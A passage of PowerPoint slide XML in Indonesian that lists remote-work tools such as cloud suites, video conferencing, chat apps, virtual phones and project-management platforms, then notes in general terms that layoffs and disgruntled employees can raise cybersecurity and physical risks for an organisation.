              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> desktop virtual di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kantor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bantuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pusat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Cloud-Platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Microsoft 365, Google Workspace, Dropbox, Slack, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>populer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kolaborasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dokumen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Lunak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konferensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Video-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Zoom, Microsoft Teams, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Webex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memfasilitasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> virtual, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panggilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konferensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Instan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Obrolan-Aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Slack, Microsoft Teams, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Discord </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kolaborasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Telepon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Virtual-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telepon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panggilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Alat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Proyek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>-Platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Trello, Asana, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Jira </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tugas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelacakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>proyek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koordinasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Tenaga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerja</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>PHK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fisik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>faktor-faktor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>upaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perencanaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>puas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menimbulkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpotensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terlibat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyalahgunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hilangnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karyawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpengalaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
